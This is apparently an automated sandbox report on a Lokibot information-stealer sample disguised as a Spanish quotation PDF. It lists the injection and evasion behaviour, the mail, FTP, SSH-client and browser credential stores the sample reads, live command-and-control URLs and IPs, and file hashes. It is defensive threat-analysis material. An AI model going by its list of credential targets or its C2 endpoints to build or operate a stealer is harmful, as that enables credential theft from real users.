Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe TID: 2224

Thread sleep time: -780000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_00405D7C FindFirstFileA,FindClose,	0_2_00405D7C
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004053AA
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Thread delayed: delay time: 60000

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	API call chain: ExitProcess graph end node			graph_0-3610
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	API call chain: ExitProcess graph end node			graph_0-3611

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405DA3

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,

1_2_00402B7C

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_0019EA4E mov eax, dword ptr fs:[00000030h]	0_2_0019EA4E
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_0019E83A mov eax, dword ptr fs:[00000030h]	0_2_0019E83A
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_0019EB7C mov eax, dword ptr fs:[00000030h]	0_2_0019EB7C
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_0019EAFF mov eax, dword ptr fs:[00000030h]	0_2_0019EAFF
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_0019EB3E mov eax, dword ptr fs:[00000030h]	0_2_0019EB3E
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]	1_2_0040317B

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Memory written: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Process created: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe"

Jump to behavior

Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmp	Binary or memory string: SProgram Managerl
Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd,
Source: Cotizaci#U00f3npdf.exe, 00000001.00000002.507208708.0000000000DB0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 0_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405AA7

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

Code function: 1_2_00406069 GetUserNameW,

1_2_00406069

Stealing of Sensitive Information:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: PopPassword		1_2_0040D069
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: SmtpPassword		1_2_0040D069

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Lokibot

Show sources

Source: Yara match	File source: 00000001.00000002.506971485.0000000000728000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.446107711.0000000000745000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Cotizaci#U00f3npdf.exe.3040000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Cotizaci#U00f3npdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.247742577.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.246598444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.245329256.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.250602382.0000000003040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2604, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Cotizaci#U00f3npdf.exe PID: 2512, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Access Token Manipulation1	Deobfuscate/Decode Files or Information1	OS Credential Dumping2	Account Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Obfuscated Files or Information2	Credentials in Registry2	File and Directory Discovery2	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Software Packing1	Security Account Manager	System Information Discovery5	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Masquerading11	NTDS	Query Registry1	Distributed Component Object Model	Clipboard Data1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Virtualization/Sandbox Evasion11	LSA Secrets	Security Software Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Process Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Virtualization/Sandbox Evasion11	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Cotizaci#U00f3npdf.exe	25%	Virustotal		Browse
Cotizaci#U00f3npdf.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.Cotizaci#U00f3npdf.exe.400000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.Cotizaci#U00f3npdf.exe.400000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.1.Cotizaci#U00f3npdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.Cotizaci#U00f3npdf.exe.400000.6.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.Cotizaci#U00f3npdf.exe.400000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.Cotizaci#U00f3npdf.exe.400000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.Cotizaci#U00f3npdf.exe.400000.0.unpack	100%	Avira	TR/Patched.Ren.Gen2	Download File
0.2.Cotizaci#U00f3npdf.exe.3040000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.Cotizaci#U00f3npdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
slimpackage.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://slimpackage.com/slimmain/five/fre.php	9%	Virustotal		Browse
http://slimpackage.com/slimmain/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
slimpackage.com	104.223.93.105	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe	unknown
http://slimpackage.com/slimmain/five/fre.php	true	9%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	Cotizaci#U00f3npdf.exe	false		high
http://nsis.sf.net/NSIS_ErrorError	Cotizaci#U00f3npdf.exe	false		high
http://www.ibsensoftware.com/	Cotizaci#U00f3npdf.exe, Cotizaci#U00f3npdf.exe, 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000001.00000001.249037947.0000000000400000.00000040.00020000.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.223.93.105	slimpackage.com	United States		8100	ASN-QUADRANET-GLOBALUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553335
Start date:	14.01.2022
Start time:	17:27:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Cotizaci#U00f3npdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/6@59/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 73% (good quality ratio 70.3%) Quality average: 79% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 88% Number of executed functions: 64 Number of non-executed functions: 38
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, dual-a-0001.dc-msedge.net, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
17:28:16	API Interceptor	56x Sleep call for process: Cotizaci#U00f3npdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.223.93.105	INV#1871 and DN#0252 against PO#PUR450500899.exe	Get hash	malicious	Browse	slimpackage.com/slimfit/five/fre.php
	QUOTAZIONEpdf.exe	Get hash	malicious	Browse	slimpackage.com/slimmain/five/fre.php
	__.exe	Get hash	malicious	Browse	slimpackage.com/slimmain/five/fre.php
	Purchase Order #5000012803.exe	Get hash	malicious	Browse	slimpackage.com/slimfit/five/fre.php
	Trasferimento.vbs	Get hash	malicious	Browse	nofearsw.in/cgi-sys/suspendedpage.cgi
	EL1aBD5Zqr.exe	Get hash	malicious	Browse	nofearsw.in/swo/inc/11828554f46a7d.php
	TnUFqujldH.exe	Get hash	malicious	Browse	nofearsw.in/swo/inc/11828554f46a7d.php
	20210711494754.vbs	Get hash	malicious	Browse	nofearsw.in/fen/inc/9fa099d0b6dea5.php
	msg001.vbs	Get hash	malicious	Browse	nofearsw.in/swo/inc/11828554f46a7d.php
	Chuyen giao,pdf.vbs	Get hash	malicious	Browse	nofearsw.in/swo/inc/11828554f46a7d.php
	Dekont.vbs	Get hash	malicious	Browse	nofearsw.in/swo/inc/11828554f46a7d.php
	3Bws6ne7Ye.exe	Get hash	malicious	Browse	jlpack.email/file/Panel/five/fre.php
	filDHjBKef.exe	Get hash	malicious	Browse	jlpack.email/grace/Panel/five/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
slimpackage.com	INV#1871 and DN#0252 against PO#PUR450500899.exe	Get hash	malicious	Browse	104.223.93.105
	QUOTAZIONEpdf.exe	Get hash	malicious	Browse	104.223.93.105
	__.exe	Get hash	malicious	Browse	104.223.93.105
	Purchase Order #5000012803.exe	Get hash	malicious	Browse	104.223.93.105

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ASN-QUADRANET-GLOBALUS	INV#1871 and DN#0252 against PO#PUR450500899.exe	Get hash	malicious	Browse	104.223.93.105
	QUOTAZIONEpdf.exe	Get hash	malicious	Browse	104.223.93.105
	__.exe	Get hash	malicious	Browse	104.223.93.105
	Purchase Order #5000012803.exe	Get hash	malicious	Browse	104.223.93.105
	payload1.exe	Get hash	malicious	Browse	72.11.157.208
	81LeRZW5Bd	Get hash	malicious	Browse	45.199.228.213
	27mfOKe6Ht	Get hash	malicious	Browse	162.220.9.180
	Antisocial.arm	Get hash	malicious	Browse	45.199.228.220
	BoFA_Remittance Advice.BoFA00002251.xlsb	Get hash	malicious	Browse	104.223.119.167
	b0Ht6p5D1J	Get hash	malicious	Browse	23.156.2.11
	Payment Remittance Advice_000000202213.xlsb	Get hash	malicious	Browse	104.223.119.167
	5aUrqt6CKT	Get hash	malicious	Browse	154.205.102.18
	Dm2sVBT0DW	Get hash	malicious	Browse	45.199.228.242
	arm7	Get hash	malicious	Browse	23.153.31.214
	arm	Get hash	malicious	Browse	23.153.31.218
	UvGeBNTPpT.exe	Get hash	malicious	Browse	67.215.246.10
	7ega.x86	Get hash	malicious	Browse	104.247.190.160
	yB9IhcEMyw	Get hash	malicious	Browse	204.152.199.240
	Fourloko.arm-20211230-1450	Get hash	malicious	Browse	45.199.228.235
	abc	Get hash	malicious	Browse	155.94.205.13

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsc114F.tmp Download File
Process:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
File Type:	data
Category:	dropped
Size (bytes):	250917
Entropy (8bit):	7.742545601504465
Encrypted:	false
SSDEEP:	6144:YhLBgpumJXJnGuUAN+eNkzPqEUvqhfKuLYq:gunJXJGbxGEUvAK1q
MD5:	5DFC9959804DDC0C5314ECD87BA862FC
SHA1:	3446B84156E3A47134F92557A40E630762E025F9
SHA-256:	49277821695C781495E081F33A5DFB31295256619BB0B472498108F9F912A1ED
SHA-512:	731A82DDD6036ED1C5E34C487F2FD0FF74B192300906E742BE4FC8CF785CEA8A8B5C965BD526F1DDBD6587C15BA686D98CCA8ED33E766C490B62E9D2175FC373
Malicious:	false
Reputation:	low
Preview:	.]......,...................(...<F.......\......s]..........................................................................................................................................................................................................................................J...............Y...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsc1150.tmp\tjbqk.dll Download File
Process:	C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.8339776551191647
Encrypted:	false
SSDEEP:	24:e1GSb0JDlXEcQA3ax/+XIfG7xkFsQZo+NTyYX73rNTytk8q6I1HPnRuV4MPgics:SgZyhQ4fG7xwbT9f6IvRuqSt
MD5:	EED28D9A6DF23D102EB1E7DB08E9B8A8
SHA1:	B1EA3474DA51812F436C0D65178AAEE00C916628
SHA-256:	2107EF7267EAD9ADD2CBD586F121A505DCC92DB08F9E61D6E2CCCA056D4DEED5
SHA-512:	8B133190AF32CF0B5C0C5E1B93D84C3AE1A9494EBD0419CD911784804E74232FA15AD4F6D787E897AF05E90DD2801772C03DEA1282DED7921AF25EB0FBE353AB
Malicious:	false
Reputation:	low
